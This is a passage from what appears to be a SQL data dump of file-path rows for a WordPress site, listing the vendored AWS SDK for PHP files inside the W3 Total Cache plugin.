esourceGroupsTaggingAPIClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResourceGroupsTaggingAPI/ResourceGroupsTaggingAPIClient.php'),(5398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResponseContainerInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResponseContainerInterface.php'),(5399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Result.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Result.php'),(5400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultInterface.php'),(5401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultPaginator.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ResultPaginator.php'),(5402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Configuration.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Configuration.php'),(5403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationInterface.php'),(5404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/ConfigurationProvider.php'),(5405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Exception/ConfigurationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/Exception/ConfigurationException.php'),(5406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/QuotaManager.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/QuotaManager.php'),(5407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/RateLimiter.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/RateLimiter.php'),(5408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/RetryHelperTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Retry/RetryHelperTrait.php'),(5409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RetryMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RetryMiddleware.php'),(5410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RetryMiddlewareV2.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RetryMiddlewareV2.php'),(5411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RoboMaker/Exception/RoboMakerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RoboMaker/Exception/RoboMakerException.php'),(5412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RoboMaker/RoboMakerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/RoboMaker/RoboMakerClient.php'),(5413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53/Exception/Route53Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53/Exception/Route53Exception.php'),(5414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53/Route53Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53/Route53Client.php'),(5415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Domains/Exception/Route53DomainsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Domains/Exception/Route53DomainsException.php'),(5416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Domains/Route53DomainsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Domains/Route53DomainsClient.php'),(5417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Resolver/Exception/Route53ResolverException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Resolver/Exception/Route53ResolverException.php'),(5418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Resolver/Route53ResolverClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Route53Resolver/Route53ResolverClient.php'),(5419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/AmbiguousSuccessParser.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/AmbiguousSuccessParser.php'),(5420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ApplyChecksumMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ApplyChecksumMiddleware.php'),(5421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BatchDelete.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BatchDelete.php'),(5422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointArnMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointArnMiddleware.php'),(5423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/BucketEndpointMiddleware.php'),(5424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTrait.php'),(5425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTraitV2.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/CryptoParamsTraitV2.php'),(5426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/HeadersMetadataStrategy.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/HeadersMetadataStrategy.php'),(5427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/InstructionFileMetadataStrategy.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/InstructionFileMetadataStrategy.php'),(5428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClient.php'),(5429,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClientV2.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionClientV2.php'),(5430,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploader.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploader.php'),(5431,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploaderV2.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/S3EncryptionMultipartUploaderV2.php'),(5432,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/UserAgentTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Crypto/UserAgentTrait.php'),(5433,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/EndpointRegionHelperTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/EndpointRegionHelperTrait.php'),(5434,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/DeleteMultipleObjectsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/DeleteMultipleObjectsException.php'),(5435,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/PermanentRedirectException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/PermanentRedirectException.php'),(5436,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3Exception.php'),(5437,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3MultipartUploadException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Exception/S3MultipartUploadException.php'),(5438,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/GetBucketLocationParser.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/GetBucketLocationParser.php'),(5439,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartCopy.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartCopy.php'),(5440,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploader.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploader.php'),(5441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploadingTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/MultipartUploadingTrait.php'),(5442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectCopier.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectCopier.php'),(5443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectUploader.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/ObjectUploader.php'),(5444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PermanentRedirectMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PermanentRedirectMiddleware.php'),(5445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObject.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObject.php'),(5446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObjectV4.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PostObjectV4.php'),(5447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PutObjectUrlMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/PutObjectUrlMiddleware.php'),(5448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Configuration.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Configuration.php'),(5449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationInterface.php'),(5450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/ConfigurationProvider.php'),(5451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Exception/ConfigurationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Exception/ConfigurationException.php'),(5452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RetryableMalformedResponseParser.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RetryableMalformedResponseParser.php'),(5453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3Client.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3Client.php'),(5454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientInterface.php'),(5455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientTrait.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3ClientTrait.php'),(5456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3EndpointMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3EndpointMiddleware.php'),(5457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3MultiRegionClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3MultiRegionClient.php'),(5458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3UriParser.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/S3UriParser.php'),(5459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/SSECMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/SSECMiddleware.php'),(5460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/StreamWrapper.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/StreamWrapper.php'),(5461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Transfer.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/Transfer.php'),(5462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Configuration.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Configuration.php'),(5463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationInterface.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationInterface.php'),(5464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationProvider.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/ConfigurationProvider.php'),(5465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Exception/ConfigurationException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/UseArnRegion/Exception/ConfigurationException.php'),(5466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/EndpointArnMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/EndpointArnMiddleware.php'),(5467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/Exception/S3ControlException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/Exception/S3ControlException.php'),(5468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlClient.php'),(5469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlEndpointMiddleware.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Control/S3ControlEndpointMiddleware.php'),(5470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/Exception/S3OutpostsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/Exception/S3OutpostsException.php'),(5471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/S3OutpostsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3Outposts/S3OutpostsClient.php'),(5472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/Exception/SSMContactsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/Exception/SSMContactsException.php'),(5473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/SSMContactsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMContacts/SSMContactsClient.php'),(5474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/Exception/SSMIncidentsException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/Exception/SSMIncidentsException.php'),(5475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/SSMIncidentsClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSMIncidents/SSMIncidentsClient.php'),(5476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/Exception/SSOException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/Exception/SSOException.php'),(5477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/SSOClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSO/SSOClient.php'),(5478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/Exception/SSOAdminException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/Exception/SSOAdminException.php'),(5479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/SSOAdminClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOAdmin/SSOAdminClient.php'),(5480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/Exception/SSOOIDCException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/Exception/SSOOIDCException.php'),(5481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/SSOOIDCClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SSOOIDC/SSOOIDCClient.php'),(5482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/Exception/SageMakerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/Exception/SageMakerException.php'),(5483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/SageMakerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMaker/SageMakerClient.php'),(5484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerFeatureStoreRuntime/Exception/SageMakerFeatureStoreRuntimeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerFeatureStoreRuntime/Exception/SageMakerFeatureStoreRuntimeException.php'),(5485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerFeatureStoreRuntime/SageMakerFeatureStoreRuntimeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerFeatureStoreRuntime/SageMakerFeatureStoreRuntimeClient.php'),(5486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerRuntime/Exception/SageMakerRuntimeException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerRuntime/Exception/SageMakerRuntimeException.php'),(5487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerRuntime/SageMakerRuntimeClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SageMakerRuntime/SageMakerRuntimeClient.php'),(5488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/Exception/SagemakerEdgeManagerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/Exception/SagemakerEdgeManagerException.php'),(5489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/SagemakerEdgeManagerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SagemakerEdgeManager/SagemakerEdgeManagerClient.php'),(5490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/Exception/SavingsPlansException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/Exception/SavingsPlansException.php'),(5491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/SavingsPlansClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SavingsPlans/SavingsPlansClient.php'),(5492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/Exception/SchemasException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/Exception/SchemasException.php'),(5493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/SchemasClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Schemas/SchemasClient.php'),(5494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sdk.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Sdk.php'),(5495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/Exception/SecretsManagerException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/Exception/SecretsManagerException.php'),(5496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/SecretsManagerClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecretsManager/SecretsManagerClient.php'),(5497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/Exception/SecurityHubException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/Exception/SecurityHubException.php'),(5498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/SecurityHubClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SecurityHub/SecurityHubClient.php'),(5499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/Exception/ServerlessApplicationRepositoryException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/Exception/ServerlessApplicationRepositoryException.php'),(5500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/ServerlessApplicationRepositoryClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServerlessApplicationRepository/ServerlessApplicationRepositoryClient.php'),(5501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/Exception/ServiceCatalogException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/Exception/ServiceCatalogException.php'),(5502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/ServiceCatalogClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceCatalog/ServiceCatalogClient.php'),(5503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/Exception/ServiceDiscoveryException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/Exception/ServiceDiscoveryException.php'),(5504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/ServiceDiscoveryClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceDiscovery/ServiceDiscoveryClient.php'),(5505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/Exception/ServiceQuotasException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/Exception/ServiceQuotasException.php'),(5506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/ServiceQuotasClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ServiceQuotas/ServiceQuotasClient.php'),(5507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/Exception/SesException.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/Exception/SesException.php'),(5508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/SesClient.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Ses/SesClient.php'),(5509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/Exception/SesV2Exception.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/SesV2/Exception/SesV2Excepti